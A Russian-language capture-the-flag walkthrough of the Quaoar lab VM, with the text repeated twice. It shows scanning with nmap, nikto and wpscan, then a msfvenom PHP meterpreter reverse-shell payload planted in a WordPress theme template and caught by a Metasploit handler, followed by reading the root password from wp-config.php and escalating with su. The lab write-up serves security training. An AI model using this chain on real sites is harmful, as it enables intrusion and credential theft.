Всем привет, эта статья, будет посвящена соревнованиям в рамках CTF. На этот раз мы будем искать флаги и уязвимости в системе Quaoar VM.
Скачиваем систему отсюда -
Монтируем в Oracle VBox или куда удобно и приступаем к сканированию.
> nmap –sV 172.16.0.178
Видим, что имеется запущенный веб сервер, просканируем его с помощью nikto:
> nikto – h 172.16.0.178
Итогом будет обнаружение файла robots.txt
robots.txt - это файл, который находится в корне сайта. В нём записываются инструкции для поисковых роботов. Эти инструкции могут запрещать к индексации некоторые разделы или страницы на сайте, указывать на правильное «зеркалирование» домена, рекомендовать поисковому роботу соблюдать определенный временной интервал между скачиванием документов с сервера и т.д.
Так же, есть доступная для нас директория wordpress, соответственно есть административная панель:
С помощью wpscan, попробуем получить список пользователей:
> wpscan –url
В результате получаем учетные данные от административной панели:
Следующим шагом будет получение сессии meterpreter с уязвимого хоста, делать будем это с помощью учетной записи Администратора, выполнив, вредоносный php код в редакторе тем. Для начала, создадим код полезной нагрузки с помощью msfvenom:
> msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.0.172 lport=4444 -f raw
Полученный код копируем от <?php до die(); затем вставляем его в шаблон и сохраняем, как показано на скриншоте ниже. В качестве изменяемого шаблона был выбран 404 Template.
Сохраняем изменения.
Запускаем Metasploit и вводим следующие команды:
> use exploit/multi/handler
> set payload php/meterpreter/reverse_tcp
> set lhost 172.16.0.172
> set lport 4444
> exploit
Открываем путь к вредоносному шаблону в браузере как показано на скриншоте ниже:
Результатом будет открытая сессия meterpreter:
Так как первая цель получить shell, то мы ее достигли. Немного побродив по серверу, в папке /home/wpadmin/ обнаруживается файл flag.txt.
А если заглянуть в /var/www/wordpress/wp-config.php, то с большой вероятностью можно сказать, что мы нашли пароль root:
> cat /var/www/wordpress/wp-config.php
Попробуем стать root:
> echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/aaa.py (Команда позволит создать в указанной папке скрипт, который даст нам доступ к pty)
> python /tmp/aaa.py
Выполненные команды позволили нам войти в терминал.
> su (Вводим пароль root)
Перейдя в корневую директорию, находим второй флаг:
Третий и последний флаг (хотя, в принципе, цели достигнуты) находится в /etc/cron.d/php5:
> cat /etc/cron.d/php5
На этом прохождение Quaoar VM можно считать завершенным. Спасибо за внимание.
Скачиваем систему отсюда -
Ссылка скрыта от гостей
Монтируем в Oracle VBox или куда удобно и приступаем к сканированию.
> nmap –sV 172.16.0.178
Видим, что имеется запущенный веб сервер, просканируем его с помощью nikto:
> nikto – h 172.16.0.178
Итогом будет обнаружение файла robots.txt
robots.txt - это файл, который находится в корне сайта. В нём записываются инструкции для поисковых роботов. Эти инструкции могут запрещать к индексации некоторые разделы или страницы на сайте, указывать на правильное «зеркалирование» домена, рекомендовать поисковому роботу соблюдать определенный временной интервал между скачиванием документов с сервера и т.д.
Так же, есть доступная для нас директория wordpress, соответственно есть административная панель:
С помощью wpscan, попробуем получить список пользователей:
> wpscan –url
Ссылка скрыта от гостей
-- enumerate u
В результате получаем учетные данные от административной панели:
Следующим шагом будет получение сессии meterpreter с уязвимого хоста, делать будем это с помощью учетной записи Администратора, выполнив, вредоносный php код в редакторе тем. Для начала, создадим код полезной нагрузки с помощью msfvenom:
> msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.0.172 lport=4444 -f raw
Полученный код копируем от <?php до die(); затем вставляем его в шаблон и сохраняем, как показано на скриншоте ниже. В качестве изменяемого шаблона был выбран 404 Template.
Сохраняем изменения.
Запускаем Metasploit и вводим следующие команды:
> use exploit/multi/handler
> set payload php/meterpreter/reverse_tcp
> set lhost 172.16.0.172
> set lport 4444
> exploit
Открываем путь к вредоносному шаблону в браузере как показано на скриншоте ниже:
Результатом будет открытая сессия meterpreter:
Так как первая цель получить shell, то мы ее достигли. Немного побродив по серверу, в папке /home/wpadmin/ обнаруживается файл flag.txt.
А если заглянуть в /var/www/wordpress/wp-config.php, то с большой вероятностью можно сказать, что мы нашли пароль root:
> cat /var/www/wordpress/wp-config.php
Попробуем стать root:
> echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/aaa.py (Команда позволит создать в указанной папке скрипт, который даст нам доступ к pty)
> python /tmp/aaa.py
Выполненные команды позволили нам войти в терминал.
> su (Вводим пароль root)
Перейдя в корневую директорию, находим второй флаг:
Третий и последний флаг (хотя, в принципе, цели достигнуты) находится в /etc/cron.d/php5:
> cat /etc/cron.d/php5
На этом прохождение Quaoar VM можно считать завершенным. Спасибо за внимание.
